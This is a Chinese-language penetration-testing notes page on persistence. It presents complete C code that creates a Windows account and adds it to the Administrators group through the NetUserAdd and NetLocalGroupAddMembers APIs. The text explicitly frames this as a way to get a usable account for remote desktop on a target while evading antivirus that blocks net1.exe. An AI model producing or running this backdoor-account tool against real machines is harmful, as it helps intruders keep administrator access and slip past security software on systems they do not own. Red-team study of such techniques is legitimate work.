通过API添加Windows用户

简介
在渗透测试过程中，如果需要白利用远程桌面等服务，往往我们还需要一个知道密码的windows账户，而这个账户通常直接由net1.exe直接添加(当然也可以直接pass the hash登录rdp，略略略)，而调用这个可执行文件往往会被第三方杀软直接拦截（略略略，defender是微软自己的，不拦合法功能），这样我们就需要想另外的办法添加用户。
分析过程
1.查文档&google(狗头)
1.调用NetUserAdd添加本地用户
2.调用NetLocalGroupAddMembers将用户添加到组
代码
微软文档解释了这个如何通过这个函数来添加操作系统账户，第一个参数servername指定了需要添加用户的主机名，传入NULL则为本地添加，第二个参数决定了第三个参数传入的结构体，通过这个函数我们可以在windows操作系统上添加账户。
1
NET_API_STATUS NET_API_FUNCTION NetUserAdd(
2
  LPCWSTR servername,
3
  DWORD   level,
4
  LPBYTE  buf,
5
  LPDWORD parm_err
6
);
Copied!
Value
Meaning
1
Specifies information about the user account. The buf parameter points to a USER_INFO_1 structure.
When you specify this level, the call initializes certain attributes to their default values. For more information, see the following Remarks section.
2
Specifies level one information and additional attributes about the user account. The buf parameter points to a USER_INFO_2 structure.
3
Specifies level two information and additional attributes about the user account. This level is valid only on servers. The buf parameter points to a USER_INFO_3 structure. Note that it is recommended that you use USER_INFO_4 instead.
4
Specifies level two information and additional attributes about the user account. This level is valid only on servers. The buf parameter points to a USER_INFO_4 structure.
Windows 2000:  This level is not supported.
同理将该账户加入administrators组也是使用类似的函数，这里就不贴参数了。
1
NET_API_STATUS NET_API_FUNCTION NetLocalGroupAddMembers(
2
  LPCWSTR servername,
3
  LPCWSTR groupname,
4
  DWORD   level,
5
  LPBYTE  buf,
6
  DWORD   totalentries
7
);
Copied!
完整代码
1
#ifndef UNICODE
2
#define UNICODE
3
#endif
4
#pragma comment(lib, "netapi32.lib")
5
​
6
#include <stdio.h>
7
#include <windows.h> 
8
#include <lm.h>
9
​
10
int wmain(int argc, wchar_t* argv[])
11
{
12
    USER_INFO_1 ui;
13
    DWORD dwLevel = 1;
14
    DWORD dwError = 0;
15
    NET_API_STATUS nStatus;
16
​
17
    if (argc != 3)
18
    {
19
        
20
        fwprintf(stderr, L"Usage:./this.exe <username> <password>\n", argv[0]);
21
        exit(1);
22
    }
23
​
24
    ui.usri1_name = argv[1];
25
    ui.usri1_password = argv[2];
26
    ui.usri1_priv = USER_PRIV_USER;
27
    ui.usri1_home_dir = NULL;
28
    ui.usri1_comment = NULL;
29
    ui.usri1_flags = UF_SCRIPT;
30
    ui.usri1_script_path = NULL;
31
​
32
    nStatus = NetUserAdd(NULL,
33
        dwLevel,
34
        (LPBYTE)&ui,
35
        &dwError);
36
​
37
    if (nStatus == NERR_Success)
38
        fwprintf(stderr, L"User %s has been successfully added\n",argv[1]);
39
​
40
    else
41
        fprintf(stderr, "A system error has occurred: %d\n", nStatus);
42
​
43
    LOCALGROUP_MEMBERS_INFO_3 account;
44
    account.lgrmi3_domainandname = argv[1];
45
​
46
    NET_API_STATUS Status = NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
47
​
48
    if (Status == NERR_Success || Status == ERROR_MEMBER_IN_ALIAS){
49
        printf("Administrators added Successfully!");
50
    }
51
    else {
52
        printf("Administrators added Failed!");
53
    }
54
    return 0;
55
}
Copied!
LINKS
NetLocalGroupAddMembers function (lmaccess.h) - Win32 apps
docsmsft
NetUserAdd function (lmaccess.h) - Win32 apps
docsmsft
​

权限维持 - 以前

获取机器安装的软件

下一个 - 权限维持

Detours InLine Hook

最近更新 1yr ago

复制链接

内容